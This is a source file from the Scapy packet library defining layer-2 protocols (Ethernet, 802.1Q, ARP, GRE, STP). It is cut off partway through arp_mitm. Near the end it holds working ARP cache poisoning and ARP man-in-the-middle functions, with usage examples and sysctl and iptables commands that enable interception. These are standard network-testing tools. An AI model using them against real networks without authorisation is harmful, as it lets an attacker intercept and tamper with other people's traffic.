• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Philippe Biondi <phil@secdev.org>
5
6"""
7Classes and functions for layer 2 protocols.
8"""
9
10import itertools
11import socket
12import struct
13import time
14
15from scapy.ansmachine import AnsweringMachine
16from scapy.arch import get_if_addr, get_if_hwaddr
17from scapy.base_classes import Gen, Net, _ScopedIP
18from scapy.compat import chb
19from scapy.config import conf
20from scapy import consts
21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \
22    DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \
23    DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC
24from scapy.error import (
25    ScapyNoDstMacException,
26    log_runtime,
27    warning,
28)
29from scapy.fields import (
30    BCDFloatField,
31    BitField,
32    ByteEnumField,
33    ByteField,
34    ConditionalField,
35    FCSField,
36    FieldLenField,
37    IP6Field,
38    IPField,
39    IntEnumField,
40    IntField,
41    LenField,
42    MACField,
43    MultipleTypeField,
44    OUIField,
45    ShortEnumField,
46    ShortField,
47    SourceIP6Field,
48    SourceIPField,
49    StrFixedLenField,
50    StrLenField,
51    ThreeBytesField,
52    XByteField,
53    XIntField,
54    XShortEnumField,
55    XShortField,
56)
57from scapy.interfaces import _GlobInterfaceType, resolve_iface
58from scapy.packet import bind_layers, Packet
59from scapy.plist import (
60    PacketList,
61    QueryAnswer,
62    SndRcvList,
63    _PacketList,
64)
65from scapy.sendrecv import sendp, srp, srp1, srploop
66from scapy.utils import (
67    checksum,
68    hexdump,
69    hexstr,
70    in4_getnsmac,
71    in4_ismaddr,
72    inet_aton,
73    inet_ntoa,
74    mac2str,
75    pretty_list,
76    valid_mac,
77    valid_net,
78    valid_net6,
79)
80
81# Typing imports
82from typing import (
83    Any,
84    Callable,
85    Dict,
86    Iterable,
87    List,
88    Optional,
89    Tuple,
90    Type,
91    Union,
92    cast,
93)
94from scapy.interfaces import NetworkInterface
95
96
97if conf.route is None:
98    # unused import, only to initialize conf.route
99    import scapy.route  # noqa: F401
100
101
102# type definitions
103_ResolverCallable = Callable[[Packet, Packet], Optional[str]]
104
105#################
106#  Tools        #
107#################
108
109
110class Neighbor:
111    def __init__(self):
112        # type: () -> None
113        self.resolvers = {}  # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501
114
115    def register_l3(self, l2, l3, resolve_method):
116        # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
117        self.resolvers[l2, l3] = resolve_method
118
119    def resolve(self, l2inst, l3inst):
120        # type: (Packet, Packet) -> Optional[str]
121        k = l2inst.__class__, l3inst.__class__
122        if k in self.resolvers:
123            return self.resolvers[k](l2inst, l3inst)
124        return None
125
126    def __repr__(self):
127        # type: () -> str
128        return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers)  # noqa: E501
129
130
131conf.neighbor = Neighbor()
132
133# cache entries expire after 120s
134_arp_cache = conf.netcache.new_cache("arp_cache", 120)
135
136
137@conf.commands.register
138def getmacbyip(ip, chainCC=0):
139    # type: (str, int) -> Optional[str]
140    """
141    Returns the destination MAC address used to reach a given IP address.
142
143    This will follow the routing table and will issue an ARP request if
144    necessary. Special cases (multicast, etc.) are also handled.
145
146    .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6.
147    """
148    # Sanitize the IP
149    if isinstance(ip, Net):
150        ip = next(iter(ip))
151    ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))
152
153    # Multicast
154    if in4_ismaddr(ip):  # mcast @
155        mac = in4_getnsmac(inet_aton(ip))
156        return mac
157
158    # Check the routing table
159    iff, _, gw = conf.route.route(ip)
160
161    # Broadcast case
162    if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)):
163        return "ff:ff:ff:ff:ff:ff"
164
165    # An ARP request is necessary
166    if gw != "0.0.0.0":
167        ip = gw
168
169    # Check the cache
170    mac = _arp_cache.get(ip)
171    if mac:
172        return mac
173
174    try:
175        res = srp1(Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=ip),
176                   type=ETH_P_ARP,
177                   iface=iff,
178                   timeout=2,
179                   verbose=0,
180                   chainCC=chainCC,
181                   nofilter=1)
182    except Exception as ex:
183        warning("getmacbyip failed on %s", ex)
184        return None
185    if res is not None:
186        mac = res.payload.hwsrc
187        _arp_cache[ip] = mac
188        return mac
189    return None
190
191
192# Fields
193
194class DestMACField(MACField):
195    def __init__(self, name):
196        # type: (str) -> None
197        MACField.__init__(self, name, None)
198
199    def i2h(self, pkt, x):
200        # type: (Optional[Packet], Optional[str]) -> str
201        if x is None and pkt is not None:
202            x = None
203        return super(DestMACField, self).i2h(pkt, x)
204
205    def i2m(self, pkt, x):
206        # type: (Optional[Packet], Optional[str]) -> bytes
207        if x is None and pkt is not None:
208            try:
209                x = conf.neighbor.resolve(pkt, pkt.payload)
210            except socket.error:
211                pass
212            if x is None:
213                if conf.raise_no_dst_mac:
214                    raise ScapyNoDstMacException()
215                else:
216                    x = "ff:ff:ff:ff:ff:ff"
217                    warning(
218                        "MAC address to reach destination not found. Using broadcast."
219                    )
220        return super(DestMACField, self).i2m(pkt, x)
221
222
223class SourceMACField(MACField):
224    __slots__ = ["getif"]
225
226    def __init__(self, name, getif=None):
227        # type: (str, Optional[Any]) -> None
228        MACField.__init__(self, name, None)
229        self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif
230
231    def i2h(self, pkt, x):
232        # type: (Optional[Packet], Optional[str]) -> str
233        if x is None:
234            iff = self.getif(pkt)
235            if iff:
236                x = resolve_iface(iff).mac
237            if x is None:
238                x = "00:00:00:00:00:00"
239        return super(SourceMACField, self).i2h(pkt, x)
240
241    def i2m(self, pkt, x):
242        # type: (Optional[Packet], Optional[Any]) -> bytes
243        return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x))
244
245
246# Layers
247
248HARDWARE_TYPES = {
249    1: "Ethernet (10Mb)",
250    2: "Ethernet (3Mb)",
251    3: "AX.25",
252    4: "Proteon ProNET Token Ring",
253    5: "Chaos",
254    6: "IEEE 802 Networks",
255    7: "ARCNET",
256    8: "Hyperchannel",
257    9: "Lanstar",
258    10: "Autonet Short Address",
259    11: "LocalTalk",
260    12: "LocalNet",
261    13: "Ultra link",
262    14: "SMDS",
263    15: "Frame relay",
264    16: "ATM",
265    17: "HDLC",
266    18: "Fibre Channel",
267    19: "ATM",
268    20: "Serial Line",
269    21: "ATM",
270}
271
272ETHER_TYPES[0x88a8] = '802_1AD'
273ETHER_TYPES[0x88e7] = '802_1AH'
274ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'
275
276
277class Ether(Packet):
278    name = "Ethernet"
279    fields_desc = [DestMACField("dst"),
280                   SourceMACField("src"),
281                   XShortEnumField("type", 0x9000, ETHER_TYPES)]
282    __slots__ = ["_defrag_pos"]
283
284    def hashret(self):
285        # type: () -> bytes
286        return struct.pack("H", self.type) + self.payload.hashret()
287
288    def answers(self, other):
289        # type: (Packet) -> int
290        if isinstance(other, Ether):
291            if self.type == other.type:
292                return self.payload.answers(other.payload)
293        return 0
294
295    def mysummary(self):
296        # type: () -> str
297        return self.sprintf("%src% > %dst% (%type%)")
298
299    @classmethod
300    def dispatch_hook(cls, _pkt=None, *args, **kargs):
301        # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
302        if _pkt and len(_pkt) >= 14:
303            if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
304                return Dot3
305        return cls
306
307
308class Dot3(Packet):
309    name = "802.3"
310    fields_desc = [DestMACField("dst"),
311                   SourceMACField("src"),
312                   LenField("len", None, "H")]
313
314    def extract_padding(self, s):
315        # type: (bytes) -> Tuple[bytes, bytes]
316        tmp_len = self.len
317        return s[:tmp_len], s[tmp_len:]
318
319    def answers(self, other):
320        # type: (Packet) -> int
321        if isinstance(other, Dot3):
322            return self.payload.answers(other.payload)
323        return 0
324
325    def mysummary(self):
326        # type: () -> str
327        return "802.3 %s > %s" % (self.src, self.dst)
328
329    @classmethod
330    def dispatch_hook(cls, _pkt=None, *args, **kargs):
331        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
332        if _pkt and len(_pkt) >= 14:
333            if struct.unpack("!H", _pkt[12:14])[0] > 1500:
334                return Ether
335        return cls
336
337
338class LLC(Packet):
339    name = "LLC"
340    fields_desc = [XByteField("dsap", 0x00),
341                   XByteField("ssap", 0x00),
342                   ByteField("ctrl", 0)]
343
344
345def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
346    """
347    Delegates resolving the default L2 destination address to the payload of L3.
348    """
349    neighbor = conf.neighbor  # type: Neighbor
350    return neighbor.resolve(l2, l3.payload)
351
352
353conf.neighbor.register_l3(Ether, LLC, l2_register_l3)
354conf.neighbor.register_l3(Dot3, LLC, l2_register_l3)
355
356
357COOKED_LINUX_PACKET_TYPES = {
358    0: "unicast",
359    1: "broadcast",
360    2: "multicast",
361    3: "unicast-to-another-host",
362    4: "sent-by-us"
363}
364
365
366class CookedLinux(Packet):
367    # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
368    name = "cooked linux"
369    # from wireshark's database
370    fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
371                   XShortField("lladdrtype", 512),
372                   ShortField("lladdrlen", 0),
373                   StrFixedLenField("src", b"", 8),
374                   XShortEnumField("proto", 0x800, ETHER_TYPES)]
375
376
377class CookedLinuxV2(CookedLinux):
378    # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
379    name = "cooked linux v2"
380    fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES),
381                   ShortField("reserved", 0),
382                   IntField("ifindex", 0),
383                   XShortField("lladdrtype", 512),
384                   ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
385                   ByteField("lladdrlen", 0),
386                   StrFixedLenField("src", b"", 8)]
387
388
389class MPacketPreamble(Packet):
390    # IEEE 802.3br Figure 99-3
391    name = "MPacket Preamble"
392    fields_desc = [StrFixedLenField("preamble", b"", length=8),
393                   FCSField("fcs", 0, fmt="!I")]
394
395
396class SNAP(Packet):
397    name = "SNAP"
398    fields_desc = [OUIField("OUI", 0x000000),
399                   XShortEnumField("code", 0x000, ETHER_TYPES)]
400
401
402conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)
403
404
405class Dot1Q(Packet):
406    name = "802.1Q"
407    aliastypes = [Ether]
408    fields_desc = [BitField("prio", 0, 3),
409                   BitField("dei", 0, 1),
410                   BitField("vlan", 1, 12),
411                   XShortEnumField("type", 0x0000, ETHER_TYPES)]
412    deprecated_fields = {
413        "id": ("dei", "2.5.0"),
414    }
415
416    def answers(self, other):
417        # type: (Packet) -> int
418        if isinstance(other, Dot1Q):
419            if ((self.type == other.type) and
420                    (self.vlan == other.vlan)):
421                return self.payload.answers(other.payload)
422        else:
423            return self.payload.answers(other)
424        return 0
425
426    def default_payload_class(self, pay):
427        # type: (bytes) -> Type[Packet]
428        if self.type <= 1500:
429            return LLC
430        return conf.raw_layer
431
432    def extract_padding(self, s):
433        # type: (bytes) -> Tuple[bytes, Optional[bytes]]
434        if self.type <= 1500:
435            return s[:self.type], s[self.type:]
436        return s, None
437
438    def mysummary(self):
439        # type: () -> str
440        if isinstance(self.underlayer, Ether):
441            return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")  # noqa: E501
442        else:
443            return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
444
445
446conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)
447
448
449class STP(Packet):
450    name = "Spanning Tree Protocol"
451    fields_desc = [ShortField("proto", 0),
452                   ByteField("version", 0),
453                   ByteField("bpdutype", 0),
454                   ByteField("bpduflags", 0),
455                   ShortField("rootid", 0),
456                   MACField("rootmac", ETHER_ANY),
457                   IntField("pathcost", 0),
458                   ShortField("bridgeid", 0),
459                   MACField("bridgemac", ETHER_ANY),
460                   ShortField("portid", 0),
461                   BCDFloatField("age", 1),
462                   BCDFloatField("maxage", 20),
463                   BCDFloatField("hellotime", 2),
464                   BCDFloatField("fwddelay", 15)]
465
466
467class ARP(Packet):
468    name = "ARP"
469    fields_desc = [
470        XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
471        XShortEnumField("ptype", 0x0800, ETHER_TYPES),
472        FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
473        FieldLenField("plen", None, fmt="B", length_of="psrc"),
474        ShortEnumField("op", 1, {
475            "who-has": 1,
476            "is-at": 2,
477            "RARP-req": 3,
478            "RARP-rep": 4,
479            "Dyn-RARP-req": 5,
480            "Dyn-RAR-rep": 6,
481            "Dyn-RARP-err": 7,
482            "InARP-req": 8,
483            "InARP-rep": 9
484        }),
485        MultipleTypeField(
486            [
487                (SourceMACField("hwsrc"),
488                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
489                  lambda pkt, val: pkt.hwtype == 1 and (
490                      pkt.hwlen == 6 or (pkt.hwlen is None and
491                                         (val is None or len(val) == 6 or
492                                          valid_mac(val)))
493                  ))),
494            ],
495            StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
496        ),
497        MultipleTypeField(
498            [
499                (SourceIPField("psrc"),
500                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
501                  lambda pkt, val: pkt.ptype == 0x0800 and (
502                      pkt.plen == 4 or (pkt.plen is None and
503                                        (val is None or valid_net(val)))
504                  ))),
505                (SourceIP6Field("psrc"),
506                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
507                  lambda pkt, val: pkt.ptype == 0x86dd and (
508                      pkt.plen == 16 or (pkt.plen is None and
509                                         (val is None or valid_net6(val)))
510                  ))),
511            ],
512            StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
513        ),
514        MultipleTypeField(
515            [
516                (MACField("hwdst", ETHER_ANY),
517                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
518                  lambda pkt, val: pkt.hwtype == 1 and (
519                      pkt.hwlen == 6 or (pkt.hwlen is None and
520                                         (val is None or len(val) == 6 or
521                                          valid_mac(val)))
522                  ))),
523            ],
524            StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
525        ),
526        MultipleTypeField(
527            [
528                (IPField("pdst", "0.0.0.0"),
529                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
530                  lambda pkt, val: pkt.ptype == 0x0800 and (
531                      pkt.plen == 4 or (pkt.plen is None and
532                                        (val is None or valid_net(val)))
533                  ))),
534                (IP6Field("pdst", "::"),
535                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
536                  lambda pkt, val: pkt.ptype == 0x86dd and (
537                      pkt.plen == 16 or (pkt.plen is None and
538                                         (val is None or valid_net6(val)))
539                  ))),
540            ],
541            StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
542        ),
543    ]
544
545    def hashret(self):
546        # type: () -> bytes
547        return struct.pack(">HHH", self.hwtype, self.ptype,
548                           ((self.op + 1) // 2)) + self.payload.hashret()
549
550    def answers(self, other):
551        # type: (Packet) -> int
552        if not isinstance(other, ARP):
553            return False
554        if self.op != other.op + 1:
555            return False
556        # We use a loose comparison on psrc vs pdst to catch answers
557        # with ARP leaks
558        self_psrc = self.get_field('psrc').i2m(self, self.psrc)  # type: bytes
559        other_pdst = other.get_field('pdst').i2m(other, other.pdst) \
560            # type: bytes
561        return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)]
562
563    def route(self):
564        # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
565        fld, dst = cast(Tuple[MultipleTypeField, str],
566                        self.getfield_and_val("pdst"))
567        fld_inner, dst = fld._find_fld_pkt_val(self, dst)
568        scope = None
569        if isinstance(dst, (Net, _ScopedIP)):
570            scope = dst.scope
571        if isinstance(dst, Gen):
572            dst = next(iter(dst))
573        if isinstance(fld_inner, IP6Field):
574            return conf.route6.route(dst, dev=scope)
575        elif isinstance(fld_inner, IPField):
576            return conf.route.route(dst, dev=scope)
577        else:
578            return None, None, None
579
580    def extract_padding(self, s):
581        # type: (bytes) -> Tuple[bytes, bytes]
582        return b"", s
583
584    def mysummary(self):
585        # type: () -> str
586        if self.op == 1:
587            return self.sprintf("ARP who has %pdst% says %psrc%")
588        if self.op == 2:
589            return self.sprintf("ARP is at %hwsrc% says %psrc%")
590        return self.sprintf("ARP %op% %psrc% > %pdst%")
591
592
593def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
594    """
595    Resolves the default L2 destination address when ARP is used.
596    """
597    if l3.op == 1:  # who-has
598        return "ff:ff:ff:ff:ff:ff"
599    elif l3.op == 2:  # is-at
600        log_runtime.warning(
601            "You should be providing the Ethernet destination MAC address when "
602            "sending an is-at ARP."
603        )
604    # Need ARP request to send ARP request...
605    plen = l3.get_field("pdst").i2len(l3, l3.pdst)
606    if plen == 4:
607        return getmacbyip(l3.pdst)
608    elif plen == 32:
609        from scapy.layers.inet6 import getmacbyip6
610        return getmacbyip6(l3.pdst)
611    # Can't even do that
612    log_runtime.warning(
613        "You should be providing the Ethernet destination mac when sending this "
614        "kind of ARP packets."
615    )
616    return None
617
618
619conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)
620
621
622class GRErouting(Packet):
623    name = "GRE routing information"
624    fields_desc = [ShortField("address_family", 0),
625                   ByteField("SRE_offset", 0),
626                   FieldLenField("SRE_len", None, "routing_info", "B"),
627                   StrLenField("routing_info", b"",
628                               length_from=lambda pkt: pkt.SRE_len),
629                   ]
630
631
632class GRE(Packet):
633    name = "GRE"
634    deprecated_fields = {
635        "seqence_number": ("sequence_number", "2.4.4"),
636    }
637    fields_desc = [BitField("chksum_present", 0, 1),
638                   BitField("routing_present", 0, 1),
639                   BitField("key_present", 0, 1),
640                   BitField("seqnum_present", 0, 1),
641                   BitField("strict_route_source", 0, 1),
642                   BitField("recursion_control", 0, 3),
643                   BitField("flags", 0, 5),
644                   BitField("version", 0, 3),
645                   XShortEnumField("proto", 0x0000, ETHER_TYPES),
646                   ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
647                   ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
648                   ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1),  # noqa: E501
649                   ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1),  # noqa: E501
650                   ]
651
652    @classmethod
653    def dispatch_hook(cls, _pkt=None, *args, **kargs):
654        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
655        if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b:
656            return GRE_PPTP
657        return cls
658
659    def post_build(self, p, pay):
660        # type: (bytes, bytes) -> bytes
661        p += pay
662        if self.chksum_present and self.chksum is None:
663            c = checksum(p)
664            p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
665        return p
666
667
668class GRE_PPTP(GRE):
669
670    """
671    Enhanced GRE header used with PPTP
672    RFC 2637
673    """
674
675    name = "GRE PPTP"
676    deprecated_fields = {
677        "seqence_number": ("sequence_number", "2.4.4"),
678    }
679    fields_desc = [BitField("chksum_present", 0, 1),
680                   BitField("routing_present", 0, 1),
681                   BitField("key_present", 1, 1),
682                   BitField("seqnum_present", 0, 1),
683                   BitField("strict_route_source", 0, 1),
684                   BitField("recursion_control", 0, 3),
685                   BitField("acknum_present", 0, 1),
686                   BitField("flags", 0, 4),
687                   BitField("version", 1, 3),
688                   XShortEnumField("proto", 0x880b, ETHER_TYPES),
689                   ShortField("payload_len", None),
690                   ShortField("call_id", None),
691                   ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1),  # noqa: E501
692                   ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)]  # noqa: E501
693
694    def post_build(self, p, pay):
695        # type: (bytes, bytes) -> bytes
696        p += pay
697        if self.payload_len is None:
698            pay_len = len(pay)
699            p = p[:4] + chb((pay_len >> 8) & 0xff) + chb(pay_len & 0xff) + p[6:]  # noqa: E501
700        return p
701
702
703# *BSD loopback layer
704
705class LoIntEnumField(IntEnumField):
706
707    def m2i(self, pkt, x):
708        # type: (Optional[Packet], int) -> int
709        return x >> 24
710
711    def i2m(self, pkt, x):
712        # type: (Optional[Packet], Union[List[int], int, None]) -> int
713        return cast(int, x) << 24
714
715
716# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c
717# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html
718LOOPBACK_TYPES = {0x2: "IPv4",
719                  0x7: "OSI",
720                  0x10: "Appletalk",
721                  0x17: "Netware IPX/SPX",
722                  0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"}
723
724
725# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available.
726# This is to be compatible with both tcpdump and tshark
727
728class Loopback(Packet):
729    r"""
730    \*BSD loopback layer
731    """
732    __slots__ = ["_defrag_pos"]
733    name = "Loopback"
734    if consts.OPENBSD:
735        fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
736    else:
737        fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)]
738
739
740if consts.OPENBSD:
741    LoopbackOpenBSD = Loopback
742else:
743    class LoopbackOpenBSD(Loopback):
744        name = "OpenBSD Loopback"
745        fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
746
747
748class Dot1AD(Dot1Q):
749    name = '802_1AD'
750
751
752class Dot1AH(Packet):
753    name = "802_1AH"
754    fields_desc = [BitField("prio", 0, 3),
755                   BitField("dei", 0, 1),
756                   BitField("nca", 0, 1),
757                   BitField("res1", 0, 1),
758                   BitField("res2", 0, 2),
759                   ThreeBytesField("isid", 0)]
760
761    def answers(self, other):
762        # type: (Packet) -> int
763        if isinstance(other, Dot1AH):
764            if self.isid == other.isid:
765                return self.payload.answers(other.payload)
766        return 0
767
768    def mysummary(self):
769        # type: () -> str
770        return self.sprintf("802.1ah (isid=%Dot1AH.isid%")
771
772
773conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)
774
775
776bind_layers(Dot3, LLC)
777bind_layers(Ether, LLC, type=122)
778bind_layers(Ether, LLC, type=34928)
779bind_layers(Ether, Dot1Q, type=33024)
780bind_layers(Ether, Dot1AD, type=0x88a8)
781bind_layers(Ether, Dot1AH, type=0x88e7)
782bind_layers(Dot1AD, Dot1AD, type=0x88a8)
783bind_layers(Dot1AD, Dot1Q, type=0x8100)
784bind_layers(Dot1AD, Dot1AH, type=0x88e7)
785bind_layers(Dot1Q, Dot1AD, type=0x88a8)
786bind_layers(Dot1Q, Dot1AH, type=0x88e7)
787bind_layers(Dot1AH, Ether)
788bind_layers(Ether, Ether, type=1)
789bind_layers(Ether, ARP, type=2054)
790bind_layers(CookedLinux, LLC, proto=122)
791bind_layers(CookedLinux, Dot1Q, proto=33024)
792bind_layers(CookedLinux, Dot1AD, type=0x88a8)
793bind_layers(CookedLinux, Dot1AH, type=0x88e7)
794bind_layers(CookedLinux, Ether, proto=1)
795bind_layers(CookedLinux, ARP, proto=2054)
796bind_layers(MPacketPreamble, Ether)
797bind_layers(GRE, LLC, proto=122)
798bind_layers(GRE, Dot1Q, proto=33024)
799bind_layers(GRE, Dot1AD, type=0x88a8)
800bind_layers(GRE, Dot1AH, type=0x88e7)
801bind_layers(GRE, Ether, proto=0x6558)
802bind_layers(GRE, ARP, proto=2054)
803bind_layers(GRE, GRErouting, {"routing_present": 1})
804bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
805bind_layers(GRErouting, GRErouting)
806bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
807bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
808bind_layers(SNAP, Dot1Q, code=33024)
809bind_layers(SNAP, Dot1AD, type=0x88a8)
810bind_layers(SNAP, Dot1AH, type=0x88e7)
811bind_layers(SNAP, Ether, code=1)
812bind_layers(SNAP, ARP, code=2054)
813bind_layers(SNAP, STP, code=267)
814
815conf.l2types.register(ARPHDR_ETHER, Ether)
816conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
817conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
818conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
819conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
820conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
821conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
822conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
823conf.l2types.register(DLT_NULL, Loopback)
824conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)
825
826conf.l3types.register(ETH_P_ARP, ARP)
827
828
829# Techniques
830
831
832@conf.commands.register
833def arpcachepoison(
834    target,  # type: Union[str, List[str]]
835    addresses,  # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
836    broadcast=False,  # type: bool
837    count=None,  # type: Optional[int]
838    interval=15,  # type: int
839    **kwargs,  # type: Any
840):
841    # type: (...) -> None
842    """Poison targets' ARP cache
843
844    :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs
845                   or the subnet that will be poisoned.
846    :param addresses: Can be either a string, a tuple of a list of tuples.
847                      If it's a string, it's the IP to advertise to the victim,
848                      with the local interface's MAC. If it's a tuple,
849                      it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")].
850                      "IP" can be a subnet of course.
851    :param broadcast: Use broadcast ethernet
852
853    Examples for target "192.168.0.2"::
854
855        >>> arpcachepoison("192.168.0.2", "192.168.0.1")
856        >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
857        >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
858        >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
859        >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"),
860        ...                                ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])
861
862    """
863    if isinstance(target, str):
864        targets = Net(target)  # type: Union[Net, List[str]]
865        str_target = target
866    else:
867        targets = target
868        str_target = target[0]
869    if isinstance(addresses, str):
870        couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))]
871    elif isinstance(addresses, tuple):
872        couple_list = [addresses]
873    else:
874        couple_list = addresses
875    p: List[Packet] = [
876        Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) /
877        ARP(op="who-has", psrc=x, pdst=targets,
878            hwsrc=y, hwdst="00:00:00:00:00:00")
879        for x, y in couple_list
880    ]
881    if count is not None:
882        sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)
883        return
884    try:
885        while True:
886            sendp(p, iface_hint=str_target, **kwargs)
887            time.sleep(interval)
888    except KeyboardInterrupt:
889        pass
890
891
892@conf.commands.register
893def arp_mitm(
894    ip1,  # type: str
895    ip2,  # type: str
896    mac1=None,  # type: Optional[Union[str, List[str]]]
897    mac2=None,  # type: Optional[Union[str, List[str]]]
898    broadcast=False,  # type: bool
899    target_mac=None,  # type: Optional[str]
900    iface=None,  # type: Optional[_GlobInterfaceType]
901    inter=3,  # type: int
902):
903    # type: (...) -> None
904    r"""ARP MitM: poison 2 target's ARP cache
905
906    :param ip1: IPv4 of the first machine
907    :param ip2: IPv4 of the second machine
908    :param mac1: MAC of the first machine (optional: will ARP otherwise)
909    :param mac2: MAC of the second machine (optional: will ARP otherwise)
910    :param broadcast: if True, will use broadcast mac for MitM by default
911    :param target_mac: MAC of the attacker (optional: default to the interface's one)
912    :param iface: the network interface. (optional: default, route for ip1)
913
914    Example usage::
915
916        $ sysctl net.ipv4.conf.virbr0.send_redirects=0  # virbr0 = interface
917        $ sysctl net.ipv4.ip_forward=1
918        $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1
919        $ sudo scapy
920        >>> arp_mitm("192.168.122.156", "192.168.122.17")
921
922    Alternative usages:
923        >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
924        >>> arp_mitm("10.0.0.1", "10.1.1.2",
925        ...          target_mac="aa:aa:aa:aa:aa:aa",
926        ...          mac2="00:1e:eb:bf:c1:ab")
927
928    .. warning::
929        If using a subnet, this will first perform an arping, unless broadcast is on!
930
931    Remember to change the sysctl settings back..
932    """
933    if not iface:
934        iface = conf.route.route(ip1)[0]
935    if not target_mac:
936        target_mac = get_if_hwaddr(iface)
937
938    def _tups(ip, mac):
939        # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
940        if mac is None:
941            if broadcast:
942                # ip can be a Net/list/etc and will be iterated upon while sending
943                return [(ip, "ff:ff:ff:ff:ff:ff")]
944            return [(x.query.pdst, x.answer.hwsrc)
945                    for x in arping(ip, verbose=0, iface=iface)[0]]
946        elif isinstance(mac, list):
947            return [(ip, x) for x in mac]
948        else:
949            return [(ip, mac)]
950
951    tup1 = _tups(ip1, mac1)
952    if not tup1:
953        raise OSError(f"Could not resolve {ip1}")
954    tup2 = _tups(ip2, mac2)
955    if not tup2:
